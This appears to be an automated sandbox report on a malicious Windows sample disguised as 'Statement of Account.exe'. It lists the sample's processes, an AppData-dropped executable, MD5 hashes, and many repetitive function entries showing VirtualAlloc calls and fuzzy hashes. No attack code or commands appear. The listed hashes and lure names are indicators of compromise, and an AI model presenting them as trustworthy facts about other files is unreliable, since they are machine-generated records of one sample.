                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7a9dc0000
                                                        File size:875008 bytes
                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        Chronological Activities

                                                        Analysis Process: DnDcR.exe PID: 3484 Parent PID: 4920

                                                        General

                                                        Start time:14:40:16
                                                        Start date:13/10/2021
                                                        Path:C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe'
                                                        Imagebase:0xd0000
                                                        File size:65440 bytes
                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:moderate

                                                        Chronological Activities

                                                        Analysis Process: conhost.exe PID: 3088 Parent PID: 3484

                                                        General

                                                        Start time:14:40:16
                                                        Start date:13/10/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7a9dc0000
                                                        File size:875008 bytes
                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        Chronological Activities

                                                        Disassembly

                                                        Code Analysis

                                                        Reset < >

                                                          Analysis Process: Statement of Account.exe PID: 2204 Parent PID: 7744 Statement of Account.exeCOMMON

                                                          Executed Functions

                                                          Function 00403611, Relevance: 18.3, APIs: 1, Strings: 11, Instructions: 305memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,00011000,-464E4580,-AB3A48E1), ref: 00403862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: ====$====$====$====$====$====$====$====$====$====$^z(
                                                          • API String ID: 4275171209-447172488
                                                          • Opcode ID: 8adc28fe4066b599d39d9a04c4d7bf605e19ef2e50023be9e7212b37326a879c
                                                          • Instruction ID: 5f3c7a90d1f10c9e9557625816a7fd5da0e1faf1cd99d328bc8b51946578e281
                                                          • Opcode Fuzzy Hash: 8adc28fe4066b599d39d9a04c4d7bf605e19ef2e50023be9e7212b37326a879c
                                                          • Instruction Fuzzy Hash: F1617E66B1A7000B975998BE48D0967C4C7AFEF260369E63E611DF3365FDB9CC4B1208
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040225E, Relevance: 6.1, APIs: 1, Strings: 1, Instructions: 3124COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ^z(
                                                          • API String ID: 0-2030494510
                                                          • Opcode ID: e22d85cd73b19177ff458873809f9c374b333f88516d7514abdeef52d1859869
                                                          • Instruction ID: d78857c9e0874f44735923c086fdda9921d41c974775fd4003bc8095aeb63bb1
                                                          • Opcode Fuzzy Hash: e22d85cd73b19177ff458873809f9c374b333f88516d7514abdeef52d1859869
                                                          • Instruction Fuzzy Hash: ED0380137CE3C087CF174679A4A04E1BFA25F9F13833DB9ED91E99A276D77688058A04
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401868, Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 890COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: #100
                                                          • String ID: VB5!6&*
                                                          • API String ID: 1341478452-3593831657
                                                          • Opcode ID: 3589f2169d779f9764457056dbb0c43c8e21d2b85a2bdf17378d4b20b17c7230
                                                          • Instruction ID: c699d778e38de2022f5eda90a95cecba70808f7006fc03cfa1878d7864005508
                                                          • Opcode Fuzzy Hash: 3589f2169d779f9764457056dbb0c43c8e21d2b85a2bdf17378d4b20b17c7230
                                                          • Instruction Fuzzy Hash: 1C52AB7144E3C18FC7138B748DA65A17FB0AE1331471E05DBC8C19F1B3E229696ADB66
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004031BE, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 589COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ^z(
                                                          • API String ID: 0-2030494510
                                                          • Opcode ID: b855a7a426f6e6a06f2cf81487d225813502af9f540177796208e210945a06a8
                                                          • Instruction ID: bf5917811784987984844a965dc5675692b788bb35766bd811862c2817ebab27
                                                          • Opcode Fuzzy Hash: b855a7a426f6e6a06f2cf81487d225813502af9f540177796208e210945a06a8
                                                          • Instruction Fuzzy Hash: CAD16A66B197000B875A88BE48D0966C4C79FEF261329E53D652EF73A5FDB9CC0B124C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00403248, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 578COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ^z(
                                                          • API String ID: 0-2030494510
                                                          • Opcode ID: c388ebab009c73dfa29c07c1dfb5f0f9b2331e6a5d29e89859a345b997d10db8
                                                          • Instruction ID: 377ab30adf3a175aba7a39cc8f9fb7f18befe5c9c8afd9597e5c9caaf157e335
                                                          • Opcode Fuzzy Hash: c388ebab009c73dfa29c07c1dfb5f0f9b2331e6a5d29e89859a345b997d10db8
                                                          • Instruction Fuzzy Hash: 7AD19F26B197004B8B6998BE44D0557C8C79FEF262339E57E211DF33A5E9BDCD0A118C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004032D4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 521COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ^z(
                                                          • API String ID: 0-2030494510
                                                          • Opcode ID: c81b83907168fac2c8b9051c246813265b7bf444a7f5e7feafb954c52e813215
                                                          • Instruction ID: ffb5dc293b29b89982e6ad6332a70b4185f67dacd84093a9acae399c32590c1a
                                                          • Opcode Fuzzy Hash: c81b83907168fac2c8b9051c246813265b7bf444a7f5e7feafb954c52e813215
                                                          • Instruction Fuzzy Hash: 4FB16C66B197000B875A98BE48D0966C4C79FEF260379E53D652DF33A5EDBACC0A124C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004033EA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 477COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ^z(
                                                          • API String ID: 0-2030494510
                                                          • Opcode ID: 02ecd01afb6ed021ec12e043efab9a024197a78aa68fadd22d262dc28ccc01c7
                                                          • Instruction ID: 861764535614c7cee8b86a98059ebaf015eefcb4d6c1a64293a3e8b1498d1c1d
                                                          • Opcode Fuzzy Hash: 02ecd01afb6ed021ec12e043efab9a024197a78aa68fadd22d262dc28ccc01c7
                                                          • Instruction Fuzzy Hash: 6BA16B26B197000B875E88BE48D0966C4C79FEF260369E63D651EF33A5EDB9CD0B124C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040336A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 473COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ^z(
                                                          • API String ID: 0-2030494510
                                                          • Opcode ID: 3587d274b381b5e4659c52ea5430644a507edd0f88b85b10bfcc444ee9523479
                                                          • Instruction ID: 075dc6325eecaf43e9d0ad70c7fb4866e83cff2bf8c25fdefd9fa5a4184014cf
                                                          • Opcode Fuzzy Hash: 3587d274b381b5e4659c52ea5430644a507edd0f88b85b10bfcc444ee9523479
                                                          • Instruction Fuzzy Hash: 13B16B66B197000B875E88BE48D0966C4C7AFEF260369E63D651EF33A5FD79CD0A124C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040346B, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 403memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,00011000,-464E4580,-AB3A48E1), ref: 00403862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: ^z(
                                                          • API String ID: 4275171209-2030494510
                                                          • Opcode ID: d0de33fd77c4b5639d9ac844fda27257aec6c224432d04cccba05e2b8d041003
                                                          • Instruction ID: 8df38f90751ef3cf4162047dc06c6ddd0e4041bc6e1ae0dfa3807f9c78836c90
                                                          • Opcode Fuzzy Hash: d0de33fd77c4b5639d9ac844fda27257aec6c224432d04cccba05e2b8d041003
                                                          • Instruction Fuzzy Hash: 1E917066B1A7000B875998BE48D0967C4C7AFDF260369E63D651DF33A5EDB9CC0B124C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00403590, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 336memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,00011000,-464E4580,-AB3A48E1), ref: 00403862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: ^z(
                                                          • API String ID: 4275171209-2030494510
                                                          • Opcode ID: 21f3d8fb8498c4e2bc354341cef68249e498c064d4e3472da80a7cef3c298f59
                                                          • Instruction ID: c85b99bba22a1d7302b9d6ddef70cb6964b393247ae731c51e90ea9021b94ab5
                                                          • Opcode Fuzzy Hash: 21f3d8fb8498c4e2bc354341cef68249e498c064d4e3472da80a7cef3c298f59
                                                          • Instruction Fuzzy Hash: 1C717D65B1A7000F975998BE48D0966C4C7AFEF260369E63D611EF3365F9B9CD0B120C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004035A8, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 336memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,00011000,-464E4580,-AB3A48E1), ref: 00403862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: ^z(
                                                          • API String ID: 4275171209-2030494510
                                                          • Opcode ID: bd245cd8ecde0f9c2fb3d9308078012c7d432142b7e8d5eb31715eddd2998ff0
                                                          • Instruction ID: 76891881b05798997e40421ebc7a7d9b9b60fb876a34674ef1382235d64d5857
                                                          • Opcode Fuzzy Hash: bd245cd8ecde0f9c2fb3d9308078012c7d432142b7e8d5eb31715eddd2998ff0
                                                          • Instruction Fuzzy Hash: 7C718E25B1A7000B875988BE48D0966C4C79FEF260369E63D611EF3365FD79CD0A120C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00403581, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 335memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,00011000,-464E4580,-AB3A48E1), ref: 00403862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: ^z(
                                                          • API String ID: 4275171209-2030494510
                                                          • Opcode ID: 951a9c4d1fa58db0dd3c15ff8f9f5d594673f6d1b232162b86defae86f53df9d
                                                          • Instruction ID: 38b601eec5bd70f3c924873a539390ee06f03332943b8dd26978cbe1544854bc
                                                          • Opcode Fuzzy Hash: 951a9c4d1fa58db0dd3c15ff8f9f5d594673f6d1b232162b86defae86f53df9d
                                                          • Instruction Fuzzy Hash: 77717E25B1A7000F975988BE48D0966C4C79FEF260369E63D651EF3365FDB9CC0A120C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00403592, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 335memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,00011000,-464E4580,-AB3A48E1), ref: 00403862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: ^z(
                                                          • API String ID: 4275171209-2030494510
                                                          • Opcode ID: 58c7839a6b324c3ad4432d3726031346661a7aff0cab5873a3790386ae6b5cbf
                                                          • Instruction ID: cdbf1efe13b4ec393177bfc80aab3219d81e7d25e54b36e000b807e870fe9beb
                                                          • Opcode Fuzzy Hash: 58c7839a6b324c3ad4432d3726031346661a7aff0cab5873a3790386ae6b5cbf
                                                          • Instruction Fuzzy Hash: BD717D65B1A7000B975998BE48D0966C4C7AFEF260369E63D611EF3365F9B9CD0B120C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004035A6, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 335memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,00011000,-464E4580,-AB3A48E1), ref: 00403862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: ^z(
                                                          • API String ID: 4275171209-2030494510
                                                          • Opcode ID: eaed97e922a7f6b2bd1eb5d781b0f36aced40fff44d6d23881249fb06788962b
                                                          • Instruction ID: 163081c8a02bb4782d892cae045dab98194d3a0c954378214d5fa912c5efa40b
                                                          • Opcode Fuzzy Hash: eaed97e922a7f6b2bd1eb5d781b0f36aced40fff44d6d23881249fb06788962b
                                                          • Instruction Fuzzy Hash: CC718E25B197000B975988BE48D0966C4C7AFEF260369E63D611EF3365F9B9CD0B124C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00403596, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 334memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,00011000,-464E4580,-AB3A48E1), ref: 00403862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: ^z(
                                                          • API String ID: 4275171209-2030494510
                                                          • Opcode ID: fb2e3ecd65f4bdc3adcc71f920788cb86c9d1fd54df7ba30d83de25f7d531ac4
                                                          • Instruction ID: 67614ea11f6b7a415e49c4f7aa3e8db6d08edec43dd990a7540fb373c2112858
                                                          • Opcode Fuzzy Hash: fb2e3ecd65f4bdc3adcc71f920788cb86c9d1fd54df7ba30d83de25f7d531ac4
                                                          • Instruction Fuzzy Hash: EC717E25B1A7000F975988BE48D0966C4C7AFEF260369E63D651EF3365FDB9CD0A120C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004035AA, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 334memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,00011000,-464E4580,-AB3A48E1), ref: 00403862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: ^z(
                                                          • API String ID: 4275171209-2030494510
                                                          • Opcode ID: ce440ae6a6a82b80a1e3f463d220d596ff32cc71457f6c1a25c606e81a6af82a
                                                          • Instruction ID: 8b80c05ea159284fe6f2935979dfb2e7a14140fa287c8eeb0d9166fa07146e58
                                                          • Opcode Fuzzy Hash: ce440ae6a6a82b80a1e3f463d220d596ff32cc71457f6c1a25c606e81a6af82a
                                                          • Instruction Fuzzy Hash: D6717E65B1A7000B975988BE48D0966C4C79FEF260369E63E651EF3365FD79CD0B120C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00403598, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 333memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,00011000,-464E4580,-AB3A48E1), ref: 00403862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: ^z(
                                                          • API String ID: 4275171209-2030494510
                                                          • Opcode ID: d1e125e1140717d5c59de900ea3bc0b0a43e965cd800ea55e86e19222105dfee
                                                          • Instruction ID: 69299c7f44f34bfe9ee0ef548cdb6d6a97c62b28602c1763d114152fa25762b5
                                                          • Opcode Fuzzy Hash: d1e125e1140717d5c59de900ea3bc0b0a43e965cd800ea55e86e19222105dfee
                                                          • Instruction Fuzzy Hash: A3716E25B1A7000B975998BE48D0967C4C7AFEF260369E63D651EF3365FDB9CD0A120C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040359C, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 333memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,00011000,-464E4580,-AB3A48E1), ref: 00403862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: ^z(
                                                          • API String ID: 4275171209-2030494510
                                                          • Opcode ID: 89138ecfa9c5ac12ce18a54470201df617200feb4b8c2fc597744cb311f3bb15
                                                          • Instruction ID: 7dc42279062e56b064ae9ac9cfbbf5279f65462015cb57a5137c31f71c727c84
                                                          • Opcode Fuzzy Hash: 89138ecfa9c5ac12ce18a54470201df617200feb4b8c2fc597744cb311f3bb15
                                                          • Instruction Fuzzy Hash: 1F717E26B197000B875988BE48D0966C4C7AFEF260369E63D611EF3365FDB9CC0A220C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00403586, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 332memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,00011000,-464E4580,-AB3A48E1), ref: 00403862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: ^z(
                                                          • API String ID: 4275171209-2030494510
                                                          • Opcode ID: 5f696fe9b83856c87b1124166119d5b42b2a082ad538536fcff10a1c40b5931e
                                                          • Instruction ID: 95cc46694bd6db50db9cbd3cf5ac480a503dfe74d288319765380379d916775b
                                                          • Opcode Fuzzy Hash: 5f696fe9b83856c87b1124166119d5b42b2a082ad538536fcff10a1c40b5931e
                                                          • Instruction Fuzzy Hash: AF716E65B1A7000B975998BE48D0966C4C7AFEF260369E63D611EF3365FDB9CC0A124C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040359A, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 332memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,00011000,-464E4580,-AB3A48E1), ref: 00403862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: ^z(
                                                          • API String ID: 4275171209-2030494510
                                                          • Opcode ID: 963e72745027b826179a1a71952c9e6f8fce1c55ed926a3512d5260484c24f28
                                                          • Instruction ID: c387a9bbe2cfb3c565cb096c5bc9407f4e1be484dc614dbdf6186419e781e3b1
                                                          • Opcode Fuzzy Hash: 963e72745027b826179a1a71952c9e6f8fce1c55ed926a3512d5260484c24f28
                                                          • Instruction Fuzzy Hash: 62717D65B1A7000B975988BE48D0966C4C7AFEF260369E63D651EF33A5FDB9CC0A120C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040359E, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 332memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,00011000,-464E4580,-AB3A48E1), ref: 00403862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: ^z(
                                                          • API String ID: 4275171209-2030494510
                                                          • Opcode ID: 2178eb2882050fb418e85e14eec50ba392c6b1406fd2100a0c0c381fdb439856
                                                          • Instruction ID: 60a9126c88c7d02fe1da73cee228f4545ddd6c0009e62efe782a1f049b99a0ca
                                                          • Opcode Fuzzy Hash: 2178eb2882050fb418e85e14eec50ba392c6b1406fd2100a0c0c381fdb439856
                                                          • Instruction Fuzzy Hash: F9716E66B197000B875998BE48D0966C4C7AFEF260369E63D651EF3365FDB9CC0B224C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00403588, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 331memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,00011000,-464E4580,-AB3A48E1), ref: 00403862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: ^z(
                                                          • API String ID: 4275171209-2030494510
